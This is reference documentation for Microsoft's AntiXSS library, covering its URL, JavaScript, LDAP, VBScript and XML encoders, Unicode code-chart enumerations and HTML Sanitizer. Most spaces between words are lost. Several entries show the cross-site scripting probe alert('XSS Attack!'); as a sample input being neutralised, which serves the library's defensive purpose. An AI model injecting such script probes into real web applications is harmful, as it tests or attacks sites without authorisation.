inputAsString,_

codePageAsInteger_

)AsString

VisualC++

public:

staticString^HtmlFormUrlEncode(

String^input,

intcodePage

)

ParametersinputType:System.StringStringtobeencoded.codePageType:System.Int32Codepagenumberoftheinput.

ReturnValue

EncodedstringforuseinURLs.

RemarksThisfunctionencodestheoutputaspertheencodingparameter(codepage)passedtoit.Itencodesallbutknownsafecharacters.Charactersareencodedusing%SINGLE_BYTE_HEXand%DOUBLE_BYTE_HEXnotation.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers. Period- Dash_ Underscore~ Tilde

Exampleinputsandencodedoutputs:alert('XSSAttack!'); alert%28%27XSS%82%a0Attack%21%27%29%3buser@contoso.com user%40contoso.comAnti-CrossSiteScriptingLibrary

Anti-Cross+Site+Scripting+Library

SeeAlso

EncoderClassHtmlFormUrlEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.HtmlFormUrlEncodeMethod(String,Encoding)EncoderClassSeeAlso

Encodesinputstringsforuseinapplication/x-www-form-urlencodedformsubmissions.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringHtmlFormUrlEncode(

stringinput,

EncodinginputEncoding

)

VisualBasic

PublicSharedFunctionHtmlFormUrlEncode(_

inputAsString,_

inputEncodingAsEncoding_

)AsString

VisualC++

public:

staticString^HtmlFormUrlEncode(

String^input,

Encoding^inputEncoding

)

ParametersinputType:System.StringStringtobeencoded.inputEncodingType:System.Text.EncodingInputencodingtype.

ReturnValue

EncodedstringforuseinURLs.

RemarksThisfunctionencodestheoutputaspertheencodingparameter(codepage)passedtoit.Itencodesallbutknownsafecharacters.Charactersareencodedusing%SINGLE_BYTE_HEXand%DOUBLE_BYTE_HEXnotation.IftheinputEncodingisnullthenUTF-8isassumedbydefault.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers. Period- Dash_ Underscore~ Tilde

Exampleinputsandencodedoutputs:alert('XSSAttack!'); alert%28%27XSS%82%a0Attack%21%27%29%3buser@contoso.com user%40contoso.comAnti-CrossSiteScriptingLibrary

Anti-Cross+Site+Scripting+Library

SeeAlso

EncoderClassHtmlFormUrlEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.JavaScriptEncodeMethodEncoderClassSeeAlso

OverloadList

Name DescriptionJavaScriptEncode(String) Encodesinputstringsforusein

JavaScript.JavaScriptEncode(String,Boolean)

EncodesinputstringsforuseinJavaScript.

SeeAlso

EncoderClassEncoderMembersMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.JavaScriptEncodeMethod(String)EncoderClassSeeAlso

EncodesinputstringsforuseinJavaScript.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringJavaScriptEncode(

stringinput

)

VisualBasic

PublicSharedFunctionJavaScriptEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^JavaScriptEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueEncodedstringforuseinJavaScript.

RemarksThisfunctionencodesallbutknownsafecharacters.Charactersareencodedusing\xSINGLE_BYTE_HEXand\uDOUBLE_BYTE_HEXnotation.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers, Comma. Period- Dash_ Underscore

SpaceOtherInternationalcharacterranges

Exampleinputsandencodedoutputs:alert('XSSAttack!'); 'alert\x28\x27XSS

Attack\x21\x27\x29\x3b'user@contoso.com 'user\x40contoso.com'Anti-CrossSiteScriptingLibrary

'Anti-CrossSiteScriptingLibrary'

SeeAlso

EncoderClassJavaScriptEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.JavaScriptEncodeMethod(String,Boolean)EncoderClassSeeAlso

EncodesinputstringsforuseinJavaScript.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringJavaScriptEncode(

stringinput,

boolemitQuotes

)

VisualBasic

PublicSharedFunctionJavaScriptEncode(_

inputAsString,_

emitQuotesAsBoolean_

)AsString

VisualC++

public:

staticString^JavaScriptEncode(

String^input,

boolemitQuotes

)

ParametersinputType:System.StringStringtobeencoded.emitQuotesType:System.Booleanvalueindicatingwhetherornottoemitquotes.true=emitquote.false=noquote.

ReturnValueEncodedstringforuseinJavaScriptanddoesnotreturntheoutputwithenquotes.

RemarksThisfunctionencodesallbutknownsafecharacters.Charactersareencodedusing\xSINGLE_BYTE_HEXand\uDOUBLE_BYTE_HEXnotation.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers, Comma. Period- Dash_ Underscore

SpaceOtherInternationalcharacterranges

Exampleinputsandencodedoutputs:alert('XSSAttack!'); 'alert\x28\x27XSS

Attack\x21\x27\x29\x3b'user@contoso.com 'user\x40contoso.com'Anti-CrossSiteScriptingLibrary

'Anti-CrossSiteScriptingLibrary'

SeeAlso

EncoderClassJavaScriptEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.LdapDistinguishedNameEncodeMethodEncoderClassSeeAlso

OverloadList

Name DescriptionLdapDistinguishedNameEncode(String) Encodesinputstringsfor

useasavalueinLightweightDirectoryAccessProtocol(LDAP)DNs.

LdapDistinguishedNameEncode(String,Boolean,Boolean)

EncodesinputstringsforuseasavalueinLightweightDirectoryAccessProtocol(LDAP)DNs.

SeeAlso

EncoderClassEncoderMembersMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.LdapDistinguishedNameEncodeMethod(String)EncoderClassSeeAlso

EncodesinputstringsforuseasavalueinLightweightDirectoryAccessProtocol(LDAP)DNs.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringLdapDistinguishedNameEncode(

stringinput

)

VisualBasic

PublicSharedFunctionLdapDistinguishedNameEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^LdapDistinguishedNameEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueEncodedstringforuseasavalueinLDAPDNs.

RemarksThismethodencodesallbutknownsafecharactersdefinedinthesafelist.RFC2253definestheformatinwhichspecialcharactersneedtobeescapedtobeusedinsideasearchfilter.Specialcharactersneedtobeencodedin#XXformatwhereXXisthehexrepresentationofthecharacteroraspecific\escapeformat.Thefollowingexamplesillustratetheuseoftheescapingmechanism.,+\"\<> \,\+\"\\\<\>hello \hellohello hello\#hello \#helloLučić Lu#C4#8Di#C4#87

SeeAlso

EncoderClassLdapDistinguishedNameEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.LdapDistinguishedNameEncodeMethod(String,Boolean,Boolean)EncoderClassSeeAlso

EncodesinputstringsforuseasavalueinLightweightDirectoryAccessProtocol(LDAP)DNs.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringLdapDistinguishedNameEncode(

stringinput,

booluseInitialCharacterRules,

booluseFinalCharacterRule

)

VisualBasic

PublicSharedFunctionLdapDistinguishedNameEncode(_

inputAsString,_

useInitialCharacterRulesAsBoolean,_

useFinalCharacterRuleAsBoolean_

)AsString

VisualC++

public:

staticString^LdapDistinguishedNameEncode(

String^input,

booluseInitialCharacterRules,

booluseFinalCharacterRule

)

ParametersinputType:System.StringStringtobeencoded.useInitialCharacterRulesType:System.BooleanValueindicatingwhetherthespecialcaserulesforencodingofspacesand

octothorpesatthestartofastringareused.useFinalCharacterRuleType:System.BooleanValueindicatingwhetherthespecialcaseforencodingoffinalcharacterspacesisused.

ReturnValueEncodedstringforuseasavalueinLDAPDNs.

RemarksThismethodencodesallbutknownsafecharactersdefinedinthesafelist.RFC2253definestheformatinwhichspecialcharactersneedtobeescapedtobeusedinsideasearchfilter.Specialcharactersneedtobeencodedin#XXformatwhereXXisthehexrepresentationofthecharacteroraspecific\escapeformat.Thefollowingexamplesillustratetheuseoftheescapingmechanism.,+\"\<> \,\+\"\\\<\>hello \hellohello hello\#hello \#helloLučić Lu#C4#8Di#C4#87

IfuseInitialCharacterRulesissettofalsethenescapingoftheinitialspaceoroctothorpecharactersisnotperformed;,+\"\<> \,\+\"\\\<\>hello hellohello hello\#hello #helloLučić Lu#C4#8Di#C4#87

IfuseFinalCharacterRuleissettofalsethenescapingofaspaceattheendofastringisnotperformed;,+\"\<> \,\+\"\\\<\>hello hellohello hello#hello #helloLučić Lu#C4#8Di#C4#87

SeeAlso

EncoderClassLdapDistinguishedNameEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.LdapEncodeMethodEncoderClassSeeAlso

EncodesinputstringstobeusedasavalueinLightweightDirectoryAccessProtocol(LDAP)searchqueries.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

[ObsoleteAttribute("Thismethodhasbeendeprecated.PleaseuseEncoder.LdapFilterEncode()instead.")]

publicstaticstringLdapEncode(

stringinput

)

VisualBasic

<ObsoleteAttribute("Thismethodhasbeendeprecated.PleaseuseEncoder.LdapFilterEncode()instead.")>_

PublicSharedFunctionLdapEncode(_

inputAsString_

)AsString

VisualC++

[ObsoleteAttribute(L"Thismethodhasbeendeprecated.PleaseuseEncoder.LdapFilterEncode()instead.")]

public:

staticString^LdapEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueEncodedstringforuseinLDAPsearchqueries.

RemarksThismethodencodesallbutknownsafecharactersdefinedinthesafelist.RFC4515definestheformatinwhichspecialcharactersneedtobeescapedtobeusedinsideasearchfilter.Specialcharactersneedtobeencodedin\XXformatwhereXXisthehexrepresentationofthecharacter.Thefollowingexamplesillustratetheuseoftheescapingmechanism.ParensRUs(forallyourparentheticalneeds)

ParensRUs\28forallyourparentheticalneeds\29

* \2AC:\MyFile C:\5CMyFileNULLNULLNULLEOT(binary) \00\00\00\04Lučić Lu\C4\8Di\C4\87

SeeAlso

EncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.LdapFilterEncodeMethodEncoderClassSeeAlso

EncodesinputstringsforuseasavalueinLightweightDirectoryAccessProtocol(LDAP)filterqueries.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringLdapFilterEncode(

stringinput

)

VisualBasic

PublicSharedFunctionLdapFilterEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^LdapFilterEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueEncodedstringforuseasavalueinLDAPfilterqueries.

RemarksThismethodencodesallbutknownsafecharactersdefinedinthesafelist.RFC4515definestheformatinwhichspecialcharactersneedtobeescapedtobeusedinsideasearchfilter.Specialcharactersneedtobeencodedin\XXformatwhereXXisthehexrepresentationofthecharacter.Thefollowingexamplesillustratetheuseoftheescapingmechanism.ParensRUs(forallyourparentheticalneeds)

ParensRUs\28forallyourparentheticalneeds\29

* \2AC:\MyFile C:\5CMyFileNULLNULLNULLEOT(binary) \00\00\00\04Lučić Lu\C4\8Di\C4\87

SeeAlso

EncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.UrlEncodeMethodEncoderClassSeeAlso

OverloadList

Name DescriptionUrlEncode(String) Encodesinputstringsforuseinuniversal

resourcelocators(URLs).UrlEncode(String,Int32)

Encodesinputstringsforuseinuniversalresourcelocators(URLs).

UrlEncode(String,Encoding)

Encodesinputstringsforuseinuniversalresourcelocators(URLs).

SeeAlso

EncoderClassEncoderMembersMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.UrlEncodeMethod(String)EncoderClassSeeAlso

Encodesinputstringsforuseinuniversalresourcelocators(URLs).

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringUrlEncode(

stringinput

)

VisualBasic

PublicSharedFunctionUrlEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^UrlEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueEncodedstringforuseinURLs.

RemarksThisfunctionencodesallbutknownsafecharacters.Charactersareencodedusing%SINGLE_BYTE_HEXand%DOUBLE_BYTE_HEXnotation.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers. Period- Dash_ Underscore~ Tilde

Exampleinputsandencodedoutputs:alert('XSSAttack!'); alert%28%27XSS%20Attack%21%27%29%3buser@contoso.com user%40contoso.comAnti-CrossSiteScriptingLibrary

Anti-Cross%20Site%20Scripting%20Library

SeeAlso

EncoderClassUrlEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.UrlEncodeMethod(String,Int32)EncoderClassSeeAlso

Encodesinputstringsforuseinuniversalresourcelocators(URLs).

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringUrlEncode(

stringinput,

intcodePage

)

VisualBasic

PublicSharedFunctionUrlEncode(_

inputAsString,_

codePageAsInteger_

)AsString

VisualC++

public:

staticString^UrlEncode(

String^input,

intcodePage

)

ParametersinputType:System.StringStringtobeencoded.codePageType:System.Int32Codepagenumberoftheinput.

ReturnValue

EncodedstringforuseinURLs.

RemarksThisfunctionencodestheoutputaspertheencodingparameter(codepage)passedtoit.Itencodesallbutknownsafecharacters.Charactersareencodedusing%SINGLE_BYTE_HEXand%DOUBLE_BYTE_HEXnotation.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers. Period- Dash_ Underscore~ Tilde

Exampleinputsandencodedoutputs:alert('XSSAttack!'); alert%28%27XSS%82%a0Attack%21%27%29%3buser@contoso.com user%40contoso.comAnti-CrossSiteScriptingLibrary

Anti-Cross%20Site%20Scripting%20Library

SeeAlso

EncoderClassUrlEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.UrlEncodeMethod(String,Encoding)EncoderClassSeeAlso

Encodesinputstringsforuseinuniversalresourcelocators(URLs).

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringUrlEncode(

stringinput,

EncodinginputEncoding

)

VisualBasic

PublicSharedFunctionUrlEncode(_

inputAsString,_

inputEncodingAsEncoding_

)AsString

VisualC++

public:

staticString^UrlEncode(

String^input,

Encoding^inputEncoding

)

ParametersinputType:System.StringStringtobeencoded.inputEncodingType:System.Text.EncodingInputencodingtype.

ReturnValue

EncodedstringforuseinURLs.

RemarksThisfunctionencodestheoutputaspertheencodingparameter(codepage)passedtoit.Itencodesallbutknownsafecharacters.Charactersareencodedusing%SINGLE_BYTE_HEXand%DOUBLE_BYTE_HEXnotation.IftheinputEncodingisnullthenUTF-8isassumedbydefault.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers. Period- Dash_ Underscore~ Tilde

Exampleinputsandencodedoutputs:alert('XSSAttack!'); alert%28%27XSS%82%a0Attack%21%27%29%3buser@contoso.com user%40contoso.comAnti-CrossSiteScriptingLibrary

Anti-Cross%20Site%20Scripting%20Library

SeeAlso

EncoderClassUrlEncodeOverloadMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.UrlPathEncodeMethodEncoderClassSeeAlso

URL-encodesthepathsectionofaURLstringandreturnstheencodedstring.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringUrlPathEncode(

stringinput

)

VisualBasic

PublicSharedFunctionUrlPathEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^UrlPathEncode(

String^input

)

ParametersinputType:System.StringThetexttoURLpathencode

ReturnValueTheURLpathencodedtext.

SeeAlso

EncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.VisualBasicScriptEncodeMethodEncoderClassSeeAlso

EncodesinputstringsforuseinVisualBasicScript.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringVisualBasicScriptEncode(

stringinput

)

VisualBasic

PublicSharedFunctionVisualBasicScriptEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^VisualBasicScriptEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueEncodedstringforuseinVisualBasicScript.

RemarksThisfunctionencodesallbutknownsafecharacters.Charactersareencodedusing&chrw(DECIMAL)notation.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers, Comma. Period- Dash_ Underscore

Space

Exampleinputsandencodedoutputs:alert('XSSAttack!');

"alert"&chrw(40)&chrw(39)&"XSSAttack"&chrw(33)&chrw(39)&chrw(41)&chrw(59)

user@contoso.com "user"&chrw(64)&"contoso.com"Anti-CrossSiteScriptingLibrary

"Anti-CrossSiteScriptingLibrary"

SeeAlso

EncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.XmlAttributeEncodeMethodEncoderClassSeeAlso

EncodesinputstringsforuseinXMLattributes.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringXmlAttributeEncode(

stringinput

)

VisualBasic

PublicSharedFunctionXmlAttributeEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^XmlAttributeEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueEncodedstringforuseinXMLattributes.

RemarksThisfunctionencodesallbutknownsafecharacters.Charactersareencodedusing&#DECIMAL;notation.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers, Comma. Period- Dash_ Underscore

ThesafelistmaybeadjustedusingMarkAsSafe(LowerCodeCharts,LowerMidCodeCharts,MidCodeCharts,UpperMidCodeCharts,UpperCodeCharts).Exampleinputsandencodedoutputs:alert('XSSAttack!'); alert(&apos;XSSAttack!&apos);user@contoso.com user@contoso.comAnti-CrossSiteScriptingLibrary

Anti-Cross&#32;Site&#32;Scripting&#32;Library

SeeAlso

EncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

Encoder.XmlEncodeMethodEncoderClassSeeAlso

EncodesinputstringsforuseinXML.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

publicstaticstringXmlEncode(

stringinput

)

VisualBasic

PublicSharedFunctionXmlEncode(_

inputAsString_

)AsString

VisualC++

public:

staticString^XmlEncode(

String^input

)

ParametersinputType:System.StringStringtobeencoded.

ReturnValueEncodedstringforuseinXML.

RemarksThisfunctionencodesallbutknownsafecharacters.Charactersareencodedusing&#DECIMAL;notation.Safecharactersinclude:a-z LowercasealphabetA-Z Uppercasealphabet0-9 Numbers, Comma. Period- Dash_ Underscore

Space

ThesafelistmaybeadjustedusingMarkAsSafe(LowerCodeCharts,LowerMidCodeCharts,MidCodeCharts,UpperMidCodeCharts,UpperCodeCharts).Exampleinputsandencodedoutputs:alert('XSSAttack!'); alert(&apos;XSSAttack!&apos;);user@contoso.com user@contoso.comAnti-CrossSiteScriptingLibrary Anti-CrossSiteScriptingLibrary

SeeAlso

EncoderClassMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

LowerCodeChartsEnumerationSeeAlso

ValuesforthelowestsectionoftheUTF8Unicodecodetables,fromU0000toU0FFF.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

[FlagsAttribute]

publicenumLowerCodeCharts

VisualBasic

<FlagsAttribute>_

PublicEnumerationLowerCodeCharts

VisualC++

[FlagsAttribute]

publicenumclassLowerCodeCharts

Members

Membername Value DescriptionNone 0 Nocodecharts

fromthelowerregionoftheUnicodetablesaresafe-listed.

BasicLatin 1 TheBasicLatincodetable.

C1ControlsAndLatin1Supplement 2 TheC1ControlsandLatin-1Supplementcodetable.

LatinExtendedA 4 TheLatinExtended-Acodetable.

LatinExtendedB 8 TheLatinExtended-Bcodetable.

IpaExtensions 16 TheIPAExtensionscodetable.

SpacingModifierLetters 32 TheSpacingModifierLetterscodetable.

CombiningDiacriticalMarks 64 TheCombiningDiacriticalMarkscodetable.

GreekAndCoptic 128 TheGreekandCopticcodetable.

Cyrillic 256 TheCyrillic

codetable.CyrillicSupplement 512 TheCyrillic

Supplementcodetable.

Armenian 1024 TheArmeniancodetable.

Hebrew 2048 TheHebrewcodetable.

Arabic 4096 TheArabiccodetable.

Syriac 8192 TheSyriaccodetable.

ArabicSupplement 16384 TheArabicSupplementcodetable.

Thaana 32768 TheThaanacodetable.

Nko 65536 TheNkocodetable.

Samaritan 131072 TheSamaritancodetable.

Devanagari 262144 TheDevanagaricodetable.

Bengali 524288 TheBengalicodetable.

Gurmukhi 1048576 TheGurmukhicodetable.

Gujarati 2097152 TheGujaraticodetable.

Oriya 4194304 TheOriyacodetable.

Tamil 8388608 TheTamilcodetable.

Telugu 16777216 TheTelugu

codetable.Kannada 33554432 TheKannada

codetable.Malayalam 67108864 TheMalayalam

codetable.Sinhala 134217728 TheSinhala

codetable.Thai 268435456 TheThaicode

table.Lao 536870912 TheLaocode

table.Tibetan 1073741824 TheTibetan

codetable.Default 127 Thedefault

codetablesmarkedassafeoninitialisation.

SeeAlso

Microsoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

LowerMidCodeChartsEnumerationSeeAlso

Valuesforthelower-midsectionoftheUTF8Unicodecodetables,fromU1000toU1EFF.

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

[FlagsAttribute]

publicenumLowerMidCodeCharts

VisualBasic

<FlagsAttribute>_

PublicEnumerationLowerMidCodeCharts

VisualC++

[FlagsAttribute]

publicenumclassLowerMidCodeCharts

Members

Membername Value DescriptionNone 0 Nocode

chartsfromthelower-midregionoftheUnicodetablesaresafe-listed.

Myanmar 1 TheMyanmarcodetable.

Georgian 2 TheGeorgiancodetable.

HangulJamo 4 TheHangulJamocodetable.

Ethiopic 8 TheEthiopiccodetable.

EthiopicSupplement 16 TheEthiopicsupplementcodetable.

Cherokee 32 TheCherokeecodetable.

UnifiedCanadianAboriginalSyllabics 64 TheUnifiedCanadianAboriginalSyllabicscodetable.

Ogham 128 TheOgham

codetable.Runic 256 TheRunic

codetable.Tagalog 512 The

Tagalogcodetable.

Hanunoo 1024 TheHanunoocodetable.

Buhid 2048 TheBuhidcodetable.

Tagbanwa 4096 TheTagbanwacodetable.

Khmer 8192 TheKhmercodetable.

Mongolian 16384 TheMongoliancodetable.

UnifiedCanadianAboriginalSyllabicsExtended 32768 TheUnifiedCanadianAboriginalSyllabicsExtendedcodetable.

Limbu 65536 TheLimbucodetable.

TaiLe 131072 TheTaiLecodetable.

NewTaiLue 262144 TheNewTaiLuecodetable.

KhmerSymbols 524288 TheKhmerSymbolscodetable

Buginese 1048576 The

Buginesecodetable.

TaiTham 2097152 TheTaiThamcodetable.

Balinese 4194304 TheBalinesecodetable.

Sudanese 8388608 TheSudanesecodetable.

Lepcha 16777216 TheLepchacodetable.

OlChiki 33554432 TheOlChikicodetable.

VedicExtensions 67108864 TheVedicExtensionscodetable.

PhoneticExtensions 134217728 ThePhoneticExtensionscodetable.

PhoneticExtensionsSupplement 268435456 ThePhoneticExtensionsSupplementcodetable.

CombiningDiacriticalMarksSupplement 536870912 TheCombiningDiacriticalMarksSupplementcodetable.

LatinExtendedAdditional 1073741824 TheLatinExtended

Additionalcodetable.

SeeAlso

Microsoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

MidCodeChartsEnumerationSeeAlso

ValuesforthemiddlesectionoftheUTF8Unicodecodetables,fromU1F00toU2DDF

Namespace:Microsoft.Security.ApplicationAssembly:AntiXssLibrary40(inAntiXssLibrary40.dll)Version:4.2.0.0

Syntax

C#

[FlagsAttribute]

publicenumMidCodeCharts

VisualBasic

<FlagsAttribute>_

PublicEnumerationMidCodeCharts

VisualC++

[FlagsAttribute]

publicenumclassMidCodeCharts

Members

Membername Value DescriptionNone 0 Nocode

chartsfromthelowerregionoftheUnicodetablesaresafe-listed.

GreekExtended 1 TheGreekExtendedcodetable.

GeneralPunctuation 2 TheGeneralPunctuationcodetable.

SuperscriptsAndSubscripts 4 TheSuperscriptsandSubscriptscodetable.

CurrencySymbols 8 TheCurrencySymbolscodetable.

CombiningDiacriticalMarksForSymbols 16 TheCombiningDiacriticalMarksforSymbolscodetable.

LetterlikeSymbols 32 TheLetterlikeSymbolscodetable.

NumberForms 64 TheNumberFormscodetable.

Arrows 128 TheArrowscodetable.

MathematicalOperators 256 TheMathematicalOperatorscodetable.

MiscellaneousTechnical 512 TheMiscellaneousTechnicalcodetable.

ControlPictures 1024 TheControlPicturescodetable.

OpticalCharacterRecognition 2048 TheOpticalCharacterRecognitiontable.

EnclosedAlphanumerics 4096 TheEnclosedAlphanumericcodetable.

BoxDrawing 8192 TheBoxDrawingcodetable.

BlockElements 16384 TheBlockElementscodetable.

GeometricShapes 32768 TheGeometricShapescodetable.

MiscellaneousSymbols 65536 TheMiscellaneousSymbolscodetable.

Dingbats 131072 TheDingbatscodetable.

MiscellaneousMathematicalSymbolsA 262144 TheMiscellaneousMathematicalSymbols-Acodetable.

SupplementalArrowsA 524288 TheSupplementalArrows-Acodetable.

BraillePatterns 1048576 TheBraillePatternscodetable.

SupplementalArrowsB 2097152 TheSupplementalArrows-Bcodetable.

MiscellaneousMathematicalSymbolsB 4194304 TheMiscellaneousMathematicalSymbols-Bcodetable.

SupplementalMathematicalOperators 8388608 TheSupplementalMathematicalOperatorscodetable.

MiscellaneousSymbolsAndArrows 16777216 TheMiscellaneousSymbolsandArrowscodetable.

Glagolitic 33554432 TheGlagoliticcodetable.

LatinExtendedC 67108864 TheLatinExtended-Ccodetable.

Coptic 134217728 TheCoptic

codetable.GeorgianSupplement 268435456 TheGeorgian

Supplementcodetable.

Tifinagh 536870912 TheTifinaghcodetable.

EthiopicExtended 16384 TheEthiopicExtendedcodetable.

SeeAlso

Microsoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

SanitizerClassMembersSeeAlso

SanitizesinputHTMLtomakeitsafetobedisplayedonabrowserbyremovingpotentiallydangeroustags.

Namespace:Microsoft.Security.ApplicationAssembly:HtmlSanitizationLibrary(inHtmlSanitizationLibrary.dll)Version:4.2.0.0

Syntax

C#

publicstaticclassSanitizer

VisualBasic

PublicNotInheritableClassSanitizer

VisualC++

publicrefclassSanitizerabstractsealed

RemarksThissantizationlibraryusesthePrincipleofInclusions,sometimesreferredtoas"safe-listing"toprovideprotectionagainstinjectionattacks.Withsafe-listingprotection,algorithmslookforvalidinputsandautomaticallytreateverythingoutsidethatsetasapotentialattack.Thislibrarycanbeusedasadefenseindepthapproachwithothermitigationtechniques.

InheritanceHierarchySystem.ObjectMicrosoft.Security.Application.Sanitizer

SeeAlso

SanitizerMembersMicrosoft.Security.ApplicationNamespace

(c)2008,2009,2010,2011MicrosoftCorporation.Allrightsreservered.

MicrosoftAntiXSSLibrary

SanitizerMembersSanitizerClassMethodsSeeAlso

Methods

Name DescriptionGetSafeHtml(String) SanitizesinputHTML

documentforsafedisplayonbrowser.

GetSafeHtml(TextReader,Stream) SanitizesinputHTMLdocumentforsafedisplayonbrowser.

GetSafeHtml(TextReader,TextWriter)

SanitizesinputHTMLdocumentforsafedisplayonbrowser.

GetSafeHtmlFragment(String) SanitizesinputHTMLfragmentforsafedisplayonbrowser.

